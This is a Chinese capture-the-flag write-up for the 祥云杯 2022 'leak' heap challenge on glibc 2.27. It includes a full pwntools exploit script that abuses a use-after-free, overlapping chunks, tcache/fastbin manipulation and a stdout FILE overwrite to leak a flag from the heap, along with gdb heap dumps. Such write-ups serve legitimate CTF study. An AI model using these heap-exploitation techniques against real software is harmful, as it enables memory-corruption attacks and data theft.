[祥云杯 2022] pwn2 leak
admin
2024-01-18 22:27:37
0

看了看雪的WP,第一次见这个东西,复现一下。

libc-2.27-3Ubuntu1.6-amd64

这个版本的libc禁用了3u1的直接double两次free的地址不能相同,并且_IO_2_1_stdout_头部也是清空的不能通过覆盖一个尾字节泄露地址,同时题目没有show。但是题目会把flag请入到堆中。

如是我闻:

1,通过建立重叠块利用unsort残留修改后指向_IO_2_1_stdout_将写入终地址(堆地址都是55XXX,写FF填充即中)

2,释放块填满tcache,再释放放入fastbin,当tcache用完后使用fastbin时,如果tcache有空位会把fastbin剩余放入,并把fastbin第1块指针位置处bk写入堆起始地址

题目很容易看,有add,edit,free其中free有UAF

void m3free()
{unsigned __int64 n; // [rsp+8h] [rbp-8h]write_s("Index: ");n = read_n();if ( n <= 0xF ){if ( qword_2143A0[n] )free((void *)qword_2143A0[n]);}
}

先布局个堆

    add(0, 0x30)add(1, 0x500)add(3, 0x30)add(4, 0x10)add(5, 0x10)add(11, 0x40)

先设置个重叠块2在0和1块的中间,可以覆盖到1的头部,通过修改1在大小反复释放得到相应的bin

    #make a overlap on 0.5 建一个块与1重叠,以后通过它修改1的头和fdedit(1, flat(0,0,0,0x4f1,0,0x4e1))edit(0, flat(0,0,0,0x41))free(0)free(3)edit(3, p8(0xc0))add(12, 0x30)add(2, 0x30)  # 2= 0.5  overlap chunk1.head

bins的准备:

1,先放一个50的块到tcache,将来这个位置释放成unsort后,指针指向main_arena修改到_IO_2_1_stdout_ 用这个tcache块建块到_stdout_

    #将0x50放入tcacheedit(2, flat(0,0,0,0x51))free(1)       # 1 size 0x50 tcache

2,释放0x20的块填满tcache然后释放一块到fastbin

    #先将0x20的tcache填满,再释放1个到fastbinedit(2, flat(0,0,0,0x21,0,0))  #fill tcachefor i in [4,5,4,5,4,5,4]:free(i)edit(i, p64(0))free(1)   #fastbin

修改回510头,释放到到fd->main_arena

    #改为500释放得到main_arena指针edit(2, flat(0,0,0,0x511))free(1)       #unsort fd->main_arena

利用第1步准备的50块,在stdout_写入止地址(半字节爆破)

    #gdb.attach(p)#pause()#lh = int(input('lh'), 16)#将块改为50,修改fd后两字节(爆破半字节)将原指向main_arena的指针指向_IO_2_1_stdout_ x760lh = 0xcedit(2, flat(0,0,0,0x51)+p8(0x60)+p8(lh*16+7))add(13, 0x40)add(14, 0x40)  # _IO_2_1_stdout_edit(14, flat(0xfbad1800,0,0,0,0,0x5fffffffffff))   #写入输出止地址

修改指向_stdout+8 (以此为起点bk写入的位置是_IO_2_1_stdout_+0x20)建块用把tcache再建,会在指针指向处的bk位置写入堆地址。

    # fastbin reverse into tcache  2.27-3u1.6 利用bk指针写入到_IO_2_1_stdout_#将_IO_2_1_stdout_ 改为 +8,建第1个块用掉tcache,建第2个块使用fastbin,剩余部分会放入tcache,fastbin->next指针处写入heap地址#0x60   0 0,0x21,0,(heap)edit(2, flat(0,0,0,0x21)+ p8(0x68)+p8(lh*16+7))add(15, 0x10)add(6, 0x10)

最后选菜单6退出,执行exit(0)会输出*(stdout_ + 0x20)到*(+0x28)两个地址间的数据(由于止址写入的是fff所以会非常多,只需要0x250后的一小块)

    p.sendlineafter(b"Your choice: ", b'6')p.recv(0x250)print(p.recv(0x100))p.interactive()

完整的WP和当时的堆状态

from pwn import *elf = ELF('./leak')
libc_elf = ELF('/home/kali/glibc/2.27-3u1.6-amd64/libc-2.27.so')
context(arch='amd64', log_level='debug')def add(idx, size):p.sendlineafter(b"Your choice: ", b'1')p.sendlineafter(b"Index: ", str(idx).encode())p.sendlineafter(b"Size: ", str(size).encode())def edit(idx, msg):p.sendlineafter(b"Your choice: ", b'2')p.sendlineafter(b"Index: ", str(idx).encode())p.sendafter(b"Content: ", msg)def free(idx):p.sendlineafter(b"Your choice: ", b'3')p.sendlineafter(b"Index: ", str(idx).encode())def pwn():global pp = process('./leak')#lh = int(input('lh:'), 16)add(0, 0x30)add(1, 0x500)add(3, 0x30)add(4, 0x10)add(5, 0x10)add(11, 0x40)#make a overlap on 0.5 建一个块与1重叠,以后通过它修改1的头和fdedit(1, flat(0,0,0,0x4f1,0,0x4e1))edit(0, flat(0,0,0,0x41))free(0)free(3)edit(3, p8(0xc0))add(12, 0x30)add(2, 0x30)  # 2= 0.5  overlap chunk1.head#将0x50放入tcacheedit(2, flat(0,0,0,0x51))free(1)       # 1 size 0x50 tcache#先将0x20的tcache填满,再释放1个到fastbinedit(2, flat(0,0,0,0x21,0,0))  #fill tcachefor i in [4,5,4,5,4,5,4]:free(i)edit(i, p64(0))free(1)   #fastbin#改为500释放得到main_arena指针edit(2, flat(0,0,0,0x511))free(1)       #unsort fd->main_arena#gdb.attach(p)#pause()#lh = int(input('lh'), 16)#将块改为50,修改fd后两字节(爆破半字节)将原指向main_arena的指针指向_IO_2_1_stdout_ x760lh = 0xcedit(2, flat(0,0,0,0x51)+p8(0x60)+p8(lh*16+7))add(13, 0x40)add(14, 0x40)  # _IO_2_1_stdout_edit(14, flat(0xfbad1800,0,0,0,0,0x5fffffffffff))   #写入输出止地址# fastbin reverse into tcache  2.27-3u1.6 利用bk指针写入到_IO_2_1_stdout_#将_IO_2_1_stdout_ 改为 +8,建第1个块用掉tcache,建第2个块使用fastbin,剩余部分会放入tcache,fastbin->next指针处写入heap地址#0x60   0 0,0x21,0,(heap)edit(2, flat(0,0,0,0x21)+ p8(0x68)+p8(lh*16+7))add(15, 0x10)add(6, 0x10)p.sendlineafter(b"Your choice: ", b'6')p.recv(0x250)print(p.recv(0x100))p.interactive()while True:try:pwn()except:passbreak    '''
gef➤  heap bins
─────────────────────────────────────── Tcachebins for arena 0x7fa6fa1ebc40 ───────────────────────────────────────
Tcachebins[idx=0, size=0x20] count=7  ←  Chunk(addr=0x7fa6fa1ec778, size=0x0, flags=) 
Tcachebins[idx=3, size=0x50] count=255  ←  [Corrupted chunk at 0xfbad2084]
──────────────────────────────────────── Fastbins for arena 0x7fa6fa1ebc40 ────────────────────────────────────────
Fastbins[idx=0, size=0x20] 0x00
Fastbins[idx=1, size=0x30] 0x00
Fastbins[idx=2, size=0x40] 0x00
Fastbins[idx=3, size=0x50] 0x00
Fastbins[idx=4, size=0x60] 0x00
Fastbins[idx=5, size=0x70] 0x00
Fastbins[idx=6, size=0x80] 0x00
──────────────────────────────────── Unsorted Bin for arena '*0x7fa6fa1ebc40' ────────────────────────────────────
[+] unsorted_bins[0]: fw=0x558c5ff012d0, bk=0x558c5ff012d0→   Chunk(addr=0x558c5ff012e0, size=0x20, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.
───────────────────────────────────── Small Bins for arena '*0x7fa6fa1ebc40' ─────────────────────────────────────
[+] Found 0 chunks in 0 small non-empty bins.
───────────────────────────────────── Large Bins for arena '*0x7fa6fa1ebc40' ─────────────────────────────────────
[+] Found 0 chunks in 0 large non-empty bins.
gef➤  x/8gx &_IO_2_1_stdout_
0x7fa6fa1ec760 <_IO_2_1_stdout_>:       0x00000000fbad1800      0x0000000000000000
0x7fa6fa1ec770 <_IO_2_1_stdout_+16>:    0x0000000000000000      0x0000000000000000
0x7fa6fa1ec780 <_IO_2_1_stdout_+32>:    0x0000558c5ff01010      0x00005fffffffffff
0x7fa6fa1ec790 <_IO_2_1_stdout_+48>:    0x0000000000000000      0x0000000000000000
gef➤  heap chunks
Chunk(addr=0x558c5ff01010, size=0x250, flags=PREV_INUSE)[0x0000558c5ff01010     07 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00    ................]
Chunk(addr=0x558c5ff01260, size=0x40, flags=PREV_INUSE)[0x0000558c5ff01260     66 6c 61 67 7b 54 65 73 74 2e 2e 2e 2e 2e 2e 2e    flag{Test.......]
Chunk(addr=0x558c5ff012a0, size=0x40, flags=PREV_INUSE)[0x0000558c5ff012a0     00 00 00 00 00 00 00 00 10 10 f0 5f 8c 55 00 00    ..........._.U..]
Chunk(addr=0x558c5ff012e0, size=0x20, flags=PREV_INUSE)[0x0000558c5ff012e0     68 c7 1e fa a6 7f 00 00 00 00 00 00 00 00 00 00    h...............]
'''

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇:R数据分析:扫盲贴,什么是多重插补

下一篇:C/C++内存泄漏的原因以及怎么解决

相关内容

热门资讯

安卓系统缓存很难清理吗,安卓系... 手机用久了,是不是发现安卓系统的缓存就像顽固的石头,怎么也清理不干净?别急,今天就来跟你聊聊这个让人...
安卓系统通话闪退,安卓通话闪退... 手机里的安卓系统通话突然闪退,是不是让你心头一紧,感觉像是遇到了什么神秘力量?别急,今天就来跟你聊聊...
原车转安卓系统,体验智能新篇章 你有没有想过,你的爱车原车系统居然可以变身成安卓系统?没错,就是那个我们日常使用的安卓系统!今天,就...
安卓建议更新系统嘛,系统更新建... 亲爱的安卓用户们,你是不是也经常收到系统更新的提示,心里直打鼓:“这更新到底该不该点呢?”今天,就让...
小米5系统是安卓几,揭秘其背后... 你有没有想过,你的小米5手机里那神秘的系统,它到底属于安卓的哪个大家庭呢?今天,就让我带你一探究竟,...
安卓删除旧版系统缓存,释放存储... 手机用久了是不是感觉越来越卡?别急,今天就来教你怎么给安卓手机清理旧版系统缓存,让你的手机焕然一新,...
安卓windows双系统平板推... 你有没有想过,拥有一台既能流畅运行安卓应用,又能轻松驾驭Windows办公软件的平板电脑,那该是多么...
安卓系统的烹饪游戏在哪,解锁美... 你有没有想过,在忙碌的生活中,来点轻松的烹饪游戏,既能放松心情,又能学到一些烹饪技巧呢?安卓系统上的...
苹果系统转安卓系统需要钱吗,费... 你有没有想过,从苹果系统跳转到安卓系统,这中间的花费到底是个啥情况呢?是不是得准备一大笔钱,才能完成...
安卓系统平板手势密码,安全便捷... 你有没有发现,现在的生活越来越离不开手机和平板电脑了?这些小家伙不仅方便了我们的生活,还让我们的世界...
安卓系统升级后HD,安卓系统升... 你有没有发现,自从你的安卓手机升级了系统,那个HD画质好像变得不一样了呢?是不是觉得屏幕上的画面更加...
安卓十系统手机如何root,安... 亲爱的手机控们,你是否对安卓十系统手机充满了好奇,想要探索它的无限可能?今天,就让我带你一起揭开安卓...
tcl触屏切换安卓系统,体验安... 你有没有想过,家里的老式电视突然变成了智能大屏,那感觉是不是就像穿越到了未来?没错,这就是现在科技的...
国产安卓最简洁的系统,极致体验 你有没有发现,现在的手机系统越来越复杂了?各种功能堆砌得让人眼花缭乱,有时候甚至觉得手机比电脑还难操...
更换系统推荐免费安卓,免费安卓... 手机用久了是不是感觉有点卡?别急,今天就来给你支个招——更换系统推荐免费安卓!是的,你没听错,就是免...
安卓系统锁屏图片更换,安卓系统... 你有没有发现,手机锁屏界面简直就是个人风格的展示台呢?今天,就让我带你一起探索如何给安卓系统的锁屏图...
hms和安卓系统的关系,构建全... 你知道吗?在科技的世界里,有时候两个看似毫不相干的东西,竟然能擦出不一样的火花。今天,咱们就来聊聊这...
求安卓系统斗地主脚本,智能策略... 你有没有想过,在斗地主这款游戏中,能不能有个小帮手,帮你轻松赢取胜利呢?没错,今天就要来聊聊这个热门...
安卓系统运行内存扩充,解锁高效... 你有没有发现,随着手机应用的日益丰富,安卓系统的运行内存(RAM)有时候就像一个装满宝贝的箱子,总是...
如何自动发消息安卓系统,安卓系... 你是不是也和我一样,手机里堆满了各种群聊和好友,每天都要手动回复消息,累得够呛?别急,今天就来教你怎...